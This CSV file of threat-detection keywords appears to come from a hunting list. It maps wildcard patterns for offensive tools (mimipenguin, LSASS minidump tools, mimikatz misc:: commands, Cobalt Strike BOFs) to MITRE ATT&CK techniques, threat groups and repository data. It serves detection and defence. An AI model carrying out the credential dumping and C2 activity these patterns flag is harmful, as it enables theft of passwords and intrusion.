Access,https://github.com/huntergregal/mimipenguin,1,1,N/A,N/A,10,3565,645,2023-05-17T13:20:46Z,2017-03-28T21:24:28Z -*mimipenguin.*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin.cna*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin.git*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mimipenguin.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*mimipenguin.so*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipenguin_x32.so*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*mimipy.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*mimiRatz*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*mimishim.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimispool.dll*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*minidump*minikerberos*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*minidump.* lsass.dmp*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,0,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*Minidump.exe*,offensive_tool_keyword,bof-collection,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*minidump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*Minidump.sln*,offensive_tool_keyword,bof-collection,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*minidump_add_memory_block*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*minidump_add_memory64_block*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*minidumpwritedump*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*MiniDumpWriteDump*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*mirrors.aliyun.com/parrot*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*misc::aadcookie*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::clip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::cmd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::compress*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::detours*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::efs*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::lock*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::memssp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::mflt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::ncroutemon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::ngcsign*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::printnightmare*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::regedit*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::sccm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::shadowcopies*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::skeleton*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z 